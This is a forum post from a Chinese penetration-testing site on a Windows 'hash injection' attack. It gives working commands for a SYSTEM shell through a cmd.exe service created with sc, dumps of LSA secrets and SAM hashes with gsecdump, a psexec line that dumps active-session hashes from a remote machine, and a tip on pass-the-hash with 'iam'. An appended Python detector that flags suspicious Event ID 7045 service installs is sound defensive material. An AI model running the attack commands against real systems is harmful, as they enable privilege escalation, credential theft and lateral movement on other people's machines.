China Network Penetration Testing Alliance

Title: Hash injection attack

Author: admin    Time: 2012-11-6 21:09
Title: Hash injection attack
To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS
------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LM hashes that can be easily broken with Rainbow Tables.
A tip: you can use iam from the pshtools toolkit to load the hash information just captured with gsecdump into the local lsass process and so carry out a hash injection attack. The foreigners really are good at this; administrators are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, do not actually need to be cracked at all; it is just a matter of using the tool. As the original article puts it well, whether the password is 4 characters or 127 characters long, once you have the hash it is a 100% done deal.

Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
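From the defender's side, the first step of the post (creating a service whose binary is cmd.exe and starting it with sc) is noisy: every service install on Windows is recorded in the System log as Event ID 7045 ("A service was installed in the system"), and PsExec's remote execution installs a service named PSEXESVC the same way. The script below is an added example and is not part of the original post or of any tool it names. It parses constructed 7045 message bodies (field names follow the event's rendered message: Service Name, Service File Name, Service Type, Service Start Type, Service Account) and flags installs whose image is a shell or script host, or whose name matches remote-execution tooling. The sample records, the `SHELL_BINARIES` list and the `REMOTE_EXEC_SERVICES` set are assumptions chosen for the example.

```python
"""Flag suspicious service installs in System log Event ID 7045 records.

Added example, not from the original post. The records below are constructed;
field names follow the rendered text of a 7045 event.
"""
import re
from dataclasses import dataclass

# OS binaries that are legitimate tools but almost never the image of a real
# service. Matching on the basename keeps the rule robust to path variation.
SHELL_BINARIES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                  "cscript.exe", "rundll32.exe", "mshta.exe"}

# Service names used by remote-execution tooling; PSEXESVC is what PsExec installs.
REMOTE_EXEC_SERVICES = {"psexesvc"}

FIELD_RE = re.compile(
    r"^(Service Name|Service File Name|Service Type|Service Start Type|Service Account):\s*(.*)$",
    re.MULTILINE,
)

# Constructed sample 7045 message bodies, one record per string.
SAMPLE_EVENTS = [
    "Service Name: shellcmdline\nService File Name: C:\\WINDOWS\\system32\\cmd.exe /K start\n"
    "Service Type: user mode service\nService Start Type: demand start\nService Account: LocalSystem",
    "Service Name: Spooler\nService File Name: C:\\WINDOWS\\system32\\spoolsv.exe\n"
    "Service Type: user mode service\nService Start Type: auto start\nService Account: LocalSystem",
    "Service Name: PSEXESVC\nService File Name: %SystemRoot%\\PSEXESVC.exe\n"
    "Service Type: user mode service\nService Start Type: demand start\nService Account: LocalSystem",
]


@dataclass
class ServiceInstall:
    name: str
    image_path: str
    service_type: str
    start_type: str
    account: str


def parse_7045(message: str) -> ServiceInstall:
    """Parse the rendered message body of a System log Event ID 7045 record."""
    f = dict(FIELD_RE.findall(message))
    return ServiceInstall(
        name=f.get("Service Name", ""),
        image_path=f.get("Service File Name", ""),
        service_type=f.get("Service Type", ""),
        start_type=f.get("Service Start Type", ""),
        account=f.get("Service Account", ""),
    )


def image_basename(image_path: str) -> str:
    """Lower-cased executable name from an image path that may be quoted and carry arguments."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', image_path)
    exe = (m.group(1) or m.group(2)) if m else image_path
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(svc: ServiceInstall) -> list[str]:
    """Return the reasons a service install looks suspicious (empty list if none)."""
    reasons = []
    exe = image_basename(svc.image_path)
    if exe in SHELL_BINARIES:
        reasons.append(f"service image is a shell/script host ({exe})")
        if svc.account.lower() == "localsystem":
            reasons.append("shell runs as LocalSystem")
    if svc.name.lower() in REMOTE_EXEC_SERVICES:
        reasons.append("known remote-execution service name")
    return reasons


def scan(messages):
    """Parse and classify each 7045 message; return (service name, reasons) for hits only."""
    findings = []
    for msg in messages:
        svc = parse_7045(msg)
        reasons = classify(svc)
        if reasons:
            findings.append((svc.name, reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_EVENTS):
        print(f"{name}: " + "; ".join(reasons))
```

Run against the constructed records, the Spooler install passes while the cmd.exe service and the PSEXESVC install are both reported. In practice the same rule is applied to 7045 events exported from the System log (or to the 4697 security audit event where service-install auditing is enabled), and a service whose image is cmd.exe running as LocalSystem deserves an immediate look at the host's logon sessions, since the post's next step is dumping their hashes.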

Welcome to the China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2